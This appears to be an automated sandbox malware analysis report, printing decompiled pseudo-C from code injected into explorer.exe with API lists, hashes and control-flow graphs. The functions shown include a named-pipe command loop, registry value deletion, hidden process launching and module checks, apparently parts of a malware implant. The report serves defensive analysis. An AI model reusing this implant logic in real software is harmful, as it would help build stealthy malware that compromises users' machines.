        						_t299 = 0x10;
        						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
        						 *0x9e680 = _t123;
        						 *_t337 = 0x610;
        						_t124 = E000895E1(0x9b9cc);
        						_push(0);
        						_push(_t124);
        						_v612 = _t124;
        						_t125 =  *0x9e688; // 0xb0000
        						_t127 = E000892E5(_t125 + 0x228);
        						_t338 = _t337 + 0xc;
        						_v616 = _t127;
        						E000885D5( &_v612);
        						_t130 = E0008B269(_t127);
        						_t246 = 3;
        						__eflags = _t130;
        						if(_t130 != 0) {
        							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
        							 *_t328 = _t246;
        						}
        						E0008861A( &_v616, 0xfffffffe);
        						_t133 =  *0x9e688; // 0xb0000
        						_t22 = _t133 + 0x114; // 0xb0114
        						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
        						_t262 =  *0x9e688; // 0xb0000
        						_t339 = _t338 + 0x14;
        						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
        						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
        							L17:
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							_v572 = _t328;
        							_v576 =  *((intOrPtr*)(_t262 + 0x214));
        							_t137 =  *0x9e680; // 0x133fda0
        							_t138 =  *(_t137 + 8);
        							__eflags = _t138;
        							if(_t138 != 0) {
        								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
        							}
        							_v620 = _v620 & 0x00000000;
        							E0008E2C6(_t353,  &_v576); // executed
        							_pop(_t262);
        							_t142 =  *0x9e6b4; // 0x133fa98
        							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
        							__eflags = _t143;
        							if(_t143 == 0) {
        								E0008E2C6(_t353,  &_v588);
        								_t235 =  *0x9e6b4; // 0x133fa98
        								_pop(_t262);
        								 *((intOrPtr*)(_t235 + 0xc))(_v632);
        							}
        							__eflags =  *0x9e73c;
        							if( *0x9e73c <= 0) {
        								goto L36;
        							} else {
        								_t165 =  *0x9e680; // 0x133fda0
        								__eflags =  *(_t165 + 8);
        								if( *(_t165 + 8) != 0) {
        									_t231 =  *(_t165 + 0xc);
        									__eflags = _t231;
        									if(_t231 != 0) {
        										 *_t231(_v580);
        									}
        								}
        								_t166 =  *0x9e688; // 0xb0000
        								_t262 =  *((intOrPtr*)(_t166 + 0x214));
        								__eflags = _t262 - _t246;
        								if(_t262 == _t246) {
        									goto L36;
        								} else {
        									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
        									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
        										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
        										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
        											E000849A5();
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											_t170 =  *0x9e684; // 0x133f8f0
        											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
        											_t262 = _v602;
        											_t248 = 0x3c;
        											_t173 = _t262 + 0x00000002 & 0x0000ffff;
        											_v596 = _t173;
        											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
        											_t178 = _t262 + 0x0000000e & 0x0000ffff;
        											_v624 = _t178;
        											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
        											_t182 =  *0x9e688; // 0xb0000
        											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
        											_t339 = _t339 + 0xc;
        											__eflags = _t184;
        											if(_t184 >= 0) {
        												_t333 = E00088604(0x1000);
        												_v616 = _t333;
        												_pop(_t262);
        												__eflags = _t333;
        												if(_t333 != 0) {
        													_t186 = E0008109A(_t262, 0x148);
        													_t305 =  *0x9e688; // 0xb0000
        													_v636 = _t186;
        													_push(_t305 + 0x648);
        													_push(0xa);
        													_push(7);
        													_t271 = 2;
        													E0008902D(_t271,  &_v572);
        													_t272 =  *0x9e688; // 0xb0000
        													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
        													_t339 = _t339 + 0x18;
        													_v632 = _t188;
        													__eflags = _t188;
        													if(_t188 != 0) {
        														_push(_v624 % _t248 & 0x0000ffff);
        														_push(_v628 & 0x0000ffff);
        														_push(_v596 % _t248 & 0x0000ffff);
        														_push(_v620 & 0x0000ffff);
        														_push(_v632);
        														_push( &_v572);
        														_t200 =  *0x9e688; // 0xb0000
        														__eflags = _t200 + 0x1020;
        														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
        														E000885D5( &_v636);
        														E0008A911(_t333, 0, 0xbb8, 1);
        														E0008861A( &_v632, 0xfffffffe);
        														_t339 = _t339 + 0x44;
        													}
        													E0008861A( &_v616, 0xfffffffe);
        													_pop(_t262);
        												}
        											}
        										}
        										goto L36;
        									}
        									__eflags = _t262 - 2;
        									if(_t262 != 2) {
        										goto L36;
        									}
        									E000849A5();
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									_t211 =  *0x9e684; // 0x133f8f0
        									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
        									_t215 = _v602 + 0x00000002 & 0x0000ffff;
        									_v628 = _t215;
        									_t277 = 0x3c;
        									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
        									_t249 = E00088604(0x1000);
        									_v624 = _t249;
        									_pop(_t278);
        									__eflags = _t249;
        									if(_t249 != 0) {
        										_t220 = E000895E1(_t278, 0x32d);
        										_t280 =  *0x9e688; // 0xb0000
        										_push(_t280 + 0x228);
        										_t282 = 0x3c;
        										_v636 = _t220;
        										_push(_v628 % _t282 & 0x0000ffff);
        										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
        										E000885D5( &_v636);
        										E0008A911(_t249, 0, 0xbb8, 1);
        										E0008861A( &_v624, 0xfffffffe);
        									}
        									goto L41;
        								}
        							}
        						} else {
        							_t238 =  *((intOrPtr*)(_t262 + 0x214));
        							__eflags = _t238 - _t246;
        							if(_t238 == _t246) {
        								goto L17;
        							}
        							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
        							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
        								L36:
        								_t144 = E000895E1(_t262, 0x610);
        								_push(0);
        								_push(_t144);
        								_v616 = _t144;
        								_t145 =  *0x9e688; // 0xb0000
        								_t329 = E000892E5(_t145 + 0x228);
        								_v612 = _t329;
        								__eflags = _t329;
        								if(_t329 != 0) {
        									_t160 = E0008B269(_t329);
        									__eflags = _t160;
        									if(_t160 != 0) {
        										_t163 =  *0x9e684; // 0x133f8f0
        										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
        									}
        									E0008861A( &_v612, 0xfffffffe);
        								}
        								E000885D5( &_v616);
        								_t150 =  *0x9e688; // 0xb0000
        								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
        								_t153 =  *0x9e688; // 0xb0000
        								_t154 = _t153 + 0x228;
        								__eflags = _t154;
        								lstrcpynW(_t154,  *0x9e738, 0x105);
        								_t331 =  *0x9e688; // 0xb0000
        								_t117 = _t331 + 0x228; // 0xb0228
        								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
        								E0008861A(0x9e740, 0xfffffffe);
        								E0008861A(0x9e738, 0xfffffffe);
        								L41:
        								_t159 = 0;
        								__eflags = 0;
        								L42:
        								return _t159;
        							}
        							__eflags = _t238 - 2;
        							if(_t238 != 2) {
        								goto L36;
        							}
        							goto L17;
        						}
        					}
        					L8:
        					_t159 = _t122 | 0xffffffff;
        					goto L42;
        				}
        				_t250 = E000895C7(0x6e2);
        				_v616 = _t250;
        				_t326 = E000895C7(0x9f5);
        				_v612 = _t326;
        				if(_t250 != 0 && _t326 != 0) {
        					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
        						_v620 = 1;
        					}
        					E000885C2( &_v616);
        					_t122 = E000885C2( &_v612);
        					_t351 = _v620;
        					if(_v620 != 0) {
        						goto L8;
        					}
        				}
        			}

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
        • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
        • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
        • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
        • Opcode Fuzzy Hash: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
        • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 314 832a1-832b4 315 832b7-832ce ConnectNamedPipe 314->315 316 832d0-832db GetLastError 315->316 317 832e1-83304 315->317 316->317 318 834c2-834c8 316->318 320 834a8 GetLastError 317->320 321 8330a-8330e 317->321 322 834ae-834bc DisconnectNamedPipe 320->322 321->320 323 83314-83320 321->323 322->315 322->318 324 833b8-833d1 call 893be 323->324 325 83326-83329 323->325 337 83476-8349b call 896ca 324->337 338 833d7-833dd 324->338 326 8332b-8332f 325->326 327 83397-833b3 call 8c319 325->327 329 8337b-83384 call 8f79f 326->329 330 83331-83334 326->330 327->322 349 83358-8335b 329->349 334 83365-83369 call 8f79f 330->334 335 83336-83339 330->335 346 8336e-83376 334->346 343 8333b-8333e 335->343 344 8334f-83353 call 8f7c1 335->344 353 8349d-834a6 call 8c319 337->353 340 833df-833f6 call 88604 338->340 341 83454-8346f call 89749 call 81da0 338->341 359 833f8-833fd 340->359 360 83471 340->360 341->337 343->322 350 83344-8334d call 8f7c1 343->350 344->349 346->353 357 8335d-83363 349->357 358 83386-83388 349->358 350->346 353->322 362 8338a-83392 call 8c319 357->362 358->362 365 8342a-83452 call 89749 call 81da0 call 894b7 359->365 366 833ff-83402 359->366 369 83473 360->369 362->322 365->369 371 83404-83425 call 8c379 call 891a6 366->371 369->337 383 83427 371->383 383->365
        C-Code - Quality: 54%
        			E000832A1() {
        				char _v8;
        				struct _OVERLAPPED* _v12;
        				struct _OVERLAPPED* _v16;
        				intOrPtr* _v20;
        				char _v24;
        				intOrPtr _v32;
        				signed int _v36;
        				intOrPtr* _v40;
        				char _v168;
        				char _v172;
        				intOrPtr _t41;
        				void* _t47;
        				char _t54;
        				char _t61;
        				intOrPtr _t64;
        				void* _t65;
        				void* _t68;
        				void* _t70;
        				void* _t72;
        				void* _t76;
        				struct _OVERLAPPED* _t82;
        				intOrPtr* _t83;
        				signed int _t84;
        				signed short* _t86;
        				intOrPtr* _t97;
        				signed short* _t105;
        				void* _t107;
        				void* _t108;
        				void* _t109;
        				intOrPtr* _t112;
        				struct _OVERLAPPED* _t113;
        				char _t114;
        				void* _t115;
        
        				_t113 = 0;
        				_t82 = 0;
        				_v8 = 0;
        				_v12 = 0;
        				while(1) {
        					_v16 = _t113;
        					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
        						break;
        					}
        					_push(_t113);
        					_push( &_v16);
        					_t41 =  *0x9e684; // 0x133f8f0
        					_push(0x80000);
        					_push( *0x9e724);
        					_push( *0x9e674);
        					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
        						GetLastError();
        					} else {
        						_t86 =  *0x9e724; // 0x1910020
        						_t47 = ( *_t86 & 0x0000ffff) - 1;
        						if(_t47 == 0) {
        							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
        							_v40 = _t112;
        							if(_t112 != 0) {
        								_t114 = _v24;
        								if(_t114 <= 1) {
        									_t113 = 0;
        									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
        									_t115 = _t115 + 0x10;
        									_v172 = _t54;
        								} else {
        									_v36 = _t114 - 1;
        									_t83 = E00088604(_t114 - 1 << 2);
        									_v32 = _t83;
        									if(_t83 == 0) {
        										_t113 = 0;
        									} else {
        										if(_t114 > 1) {
        											_v20 = _t83;
        											_t84 = 1;
        											do {
        												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
        												_t97 = _v20;
        												_t84 = _t84 + 1;
        												 *_t97 = _t64;
        												_v20 = _t97 + 4;
        											} while (_t84 < _t114);
        											_t83 = _v32;
        										}
        										_t113 = 0;
        										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
        										_t115 = _t115 + 0x10;
        										_v172 = _t61;
        										E000894B7( &_v24);
        									}
        									_t82 = _v12;
        								}
        							}
        							_t105 =  *0x9e724; // 0x1910020
        							E000896CA( &_v168,  &(_t105[4]), 0x80);
        							_push(0x84);
        							_push( &_v172);
        							_push(2);
        							goto L33;
        						} else {
        							_t65 = _t47 - 3;
        							if(_t65 == 0) {
        								_push(_t113);
        								_push(_t113);
        								_t108 = 5;
        								E0008C319(_t108);
        								 *0x9e758 = 1;
        								_t82 = 1;
        								_v12 = 1;
        							} else {
        								_t68 = _t65;
        								if(_t68 == 0) {
        									_t70 = E0008F79F( &_v8);
        									goto L13;
        								} else {
        									_t72 = _t68 - 1;
        									if(_t72 == 0) {
        										E0008F79F( &_v8);
        										goto L16;
        									} else {
        										_t76 = _t72 - 1;
        										if(_t76 == 0) {
        											_t70 = E0008F7C1( &_v8);
        											L13:
        											if(_t70 == 0) {
        												_push(_t113);
        												_push(_t113);
        												_push(0xa);
        											} else {
        												_push(_v8);
        												_push(_t70);
        												_push(5);
        											}
        											_pop(_t109);
        											E0008C319(_t109);
        										} else {
        											if(_t76 == 1) {
        												E0008F7C1( &_v8);
        												L16:
        												_push(4);
        												_push( &_v8);
        												_push(5);
        												L33:
        												_pop(_t107);
        												E0008C319(_t107);
        												_t115 = _t115 + 0xc;
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        					DisconnectNamedPipe( *0x9e674);
        					if(_t82 == 0) {
        						continue;
        					}
        					break;
        				}
        				return 0;
        			}

        APIs
        • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
        • GetLastError.KERNEL32 ref: 000832D0
          • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001F8), ref: 0008C35F
        • DisconnectNamedPipe.KERNEL32 ref: 000834B4
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
        • String ID:
        • API String ID: 2389948835-0
        • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
        • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
        • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
        • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 384 861b4-861f9 memset call 88604 387 861ff-86211 call 88604 384->387 388 86363-86369 384->388 387->388 391 86217-86234 RegOpenKeyExW 387->391 392 8623a-8626d 391->392 393 86333-86337 391->393 398 8627f-86284 392->398 399 8626f-8627a 392->399 394 86339-8633e 393->394 395 86344-86360 call 8861a * 2 393->395 394->395 395->388 398->393 401 8628a 398->401 399->393 404 8628d-862dc memset * 2 401->404 407 862de-862ee 404->407 408 86326-8632d 404->408 410 862f0-86304 407->410 411 86323 407->411 408->393 408->404 410->411 413 86306-86313 call 8c392 410->413 411->408 416 8631c-8631e call 8b1b1 413->416 417 86315-86317 413->417 416->411 417->416
        C-Code - Quality: 80%
        			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				int _v20;
        				char _v24;
        				char _v28;
        				void* _v32;
        				void* _v36;
        				char _v40;
        				char _v44;
        				char _v48;
        				char _v56;
        				void _v576;
        				intOrPtr _t63;
        				intOrPtr _t72;
        				intOrPtr _t80;
        				intOrPtr _t81;
        				intOrPtr _t82;
        				signed int _t85;
        				intOrPtr _t87;
        				int _t89;
        				intOrPtr _t90;
        				intOrPtr _t92;
        				void* _t96;
        				void* _t97;
        				void* _t98;
        				void* _t99;
        				void* _t100;
        				void* _t108;
        
        				_t108 = __fp0;
        				_t96 = __edx;
        				_t89 = 0;
        				_v8 = 0;
        				memset( &_v576, 0, 0x208);
        				_v28 = 0x104;
        				_v20 = 0x3fff;
        				_v16 = 0;
        				_t98 = E00088604(0x3fff);
        				_t100 = _t99 + 0x10;
        				_v32 = _t98;
        				if(_t98 == 0) {
        					L18:
        					return 0;
        				}
        				_t97 = E00088604(0x800);
        				_v36 = _t97;
        				if(_t97 == 0) {
        					goto L18;
        				}
        				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
        					L15:
        					if(_v8 != 0) {
        						_t63 =  *0x9e68c; // 0x133fab8
        						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
        					}
        					E0008861A( &_v32, 0x3fff);
        					E0008861A( &_v36, 0x800);
        					goto L18;
        				}
        				_push( &_v56);
        				_push( &_v40);
        				_push( &_v44);
        				_push( &_v48);
        				_push( &_v24);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push( &_v28);
        				_push( &_v576);
        				_t72 =  *0x9e68c; // 0x133fab8
        				_push(_v8);
        				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
        					__eflags = _v24;
        					if(_v24 == 0) {
        						goto L15;
        					}
        					_v12 = 0;
        					do {
        						memset(_t97, 0, 0x800);
        						memset(_t98, 0, 0x3fff);
        						_t100 = _t100 + 0x18;
        						_v20 = 0x3fff;
        						_v16 = 0x800;
        						 *_t98 = 0;
        						_t80 =  *0x9e68c; // 0x133fab8
        						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
        						__eflags = _t81;
        						if(_t81 == 0) {
        							_t82 =  *0x9e690; // 0x133fb90
        							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
        							__eflags = _t90;
        							if(_t90 != 0) {
        								_t92 =  *0x9e68c; // 0x133fab8
        								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
        								__eflags = _a16;
        								if(_a16 != 0) {
        									_t85 = E0008C392(_t90);
        									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
        									if(__eflags == 0) {
        										__eflags = 0;
        										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
        									}
        									E0008B1B1(_t90, _t96, __eflags, _t108);
        								}
        							}
        							_t89 = _v12;
        						}
        						_t89 = _t89 + 1;
        						_v12 = _t89;
        						__eflags = _t89 - _v24;
        					} while (_t89 < _v24);
        					goto L15;
        				}
        				_t87 =  *0x9e68c; // 0x133fab8
        				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
        				goto L15;
        			}

        APIs
        • memset.MSVCRT ref: 000861D2
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
        • memset.MSVCRT ref: 00086295
        • memset.MSVCRT ref: 000862A2
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: memset$AllocateHeapOpen
        • String ID:
        • API String ID: 2508404634-0
        • Opcode ID: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
        • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
        • Opcode Fuzzy Hash: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
        • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 419 8a911-8a941 memset 420 8a94c-8a971 CreateProcessW 419->420 421 8a943-8a948 419->421 422 8a9ae 420->422 423 8a973-8a976 420->423 421->420 424 8a9b0-8a9b6 422->424 425 8a978-8a988 423->425 426 8a996-8a9a6 CloseHandle 423->426 425->426 429 8a98a-8a990 GetExitCodeProcess 425->429 427 8a9ac 426->427 427->424 429->426
        C-Code - Quality: 65%
        			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
        				struct _PROCESS_INFORMATION _v20;
        				struct _STARTUPINFOW _v92;
        				signed int _t24;
        				intOrPtr _t32;
        				intOrPtr _t34;
        				int _t42;
        				WCHAR* _t44;
        
        				_t42 = 0x44;
        				memset( &_v92, 0, _t42);
        				_v92.cb = _t42;
        				asm("stosd");
        				_t44 = 1;
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t24 = _a16;
        				if(_t24 != 0) {
        					_v92.dwFlags = 1;
        					_v92.wShowWindow = 0;
        				}
        				asm("sbb eax, eax");
        				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
        					_t44 = 0;
        				} else {
        					if(_a8 != 0) {
        						_push(_a12);
        						_t34 =  *0x9e684; // 0x133f8f0
        						_push(_v20.hProcess);
        						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
        							GetExitCodeProcess(_v20.hProcess, _a8);
        						}
        					}
        					CloseHandle(_v20.hThread);
        					_t32 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t32 + 0x30))(_v20);
        				}
        				return _t44;
        			}

        APIs
        • memset.MSVCRT ref: 0008A925
        • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
        • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
        • CloseHandle.KERNELBASE(?), ref: 0008A99E
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Process$CloseCodeCreateExitHandlememset
        • String ID:
        • API String ID: 2668540068-0
        • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
        • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
        • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
        • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 430 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 433 8b07c-8b07e 430->433 434 8b0ab-8b0dd call 8c392 lstrcpynW 433->434 435 8b080-8b094 call 8bb8d 433->435 435->434 439 8b096-8b0a7 435->439 439->434
        C-Code - Quality: 87%
        			E0008B012(void* __ecx, WCHAR* __edx) {
        				int _v8;
        				void _v528;
        				char _v1046;
        				void _v1048;
        				intOrPtr _t21;
        				intOrPtr* _t26;
        				void* _t27;
        				intOrPtr _t33;
        				intOrPtr _t36;
        				void* _t39;
        				intOrPtr _t40;
        				WCHAR* _t47;
        				void* _t49;
        
        				_t39 = __ecx;
        				_v8 = 0x104;
        				_t47 = __edx;
        				memset( &_v1048, 0, 0x208);
        				memset( &_v528, 0, 0x208);
        				_t21 =  *0x9e698; // 0x133fbc8
        				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
        				_t49 = E0008B946(_t39);
        				_t26 =  *0x9e6b8; // 0x133fbd8
        				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
        				if(_t27 == 0) {
        					_t33 =  *0x9e688; // 0xb0000
        					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
        						_t36 =  *0x9e698; // 0x133fbc8
        						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
        					}
        				}
        				_t40 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t40 + 0x30))(_t49);
        				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
        				return 1;
        			}

        APIs
        • memset.MSVCRT ref: 0008B037
        • memset.MSVCRT ref: 0008B045
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
          • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
          • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
          • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
        • String ID:
        • API String ID: 3158470084-0
        • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
        • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
        • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
        • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 442 8bf37-8bf66 RegOpenKeyExW 443 8bf68-8bf6a 442->443 444 8bf6c-8bf8a RegQueryValueExW 442->444 445 8bfda-8bfdc 443->445 446 8bf8c-8bf9c call 88604 444->446 447 8bfc7-8bfca 444->447 446->447 453 8bf9e-8bfb8 RegQueryValueExW 446->453 449 8bfcc-8bfd1 447->449 450 8bfd7 447->450 449->450 451 8bfd9 450->451 451->445 454 8bfba-8bfc6 call 8861a 453->454 455 8bfdd-8bfea RegCloseKey 453->455 454->447 455->451
        C-Code - Quality: 100%
        			E0008BF37(short* __edx, short* _a4) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				char* _v20;
        				char* _t30;
        				intOrPtr _t31;
        				char* _t49;
        
        				_v16 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
        					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
        						L6:
        						if(_v8 != 0) {
        							_t31 =  *0x9e68c; // 0x133fab8
        							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
        						}
        						_t30 = 0;
        						L9:
        						return _t30;
        					}
        					_t49 = E00088604(_v12);
        					_v20 = _t49;
        					if(_t49 == 0) {
        						goto L6;
        					}
        					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
        						RegCloseKey(_v8);
        						_t30 = _t49;
        						goto L9;
        					}
        					E0008861A( &_v20, 0xfffffffe);
        					goto L6;
        				}
        				return 0;
        			}

        APIs
        • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
        • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
        • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
        • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
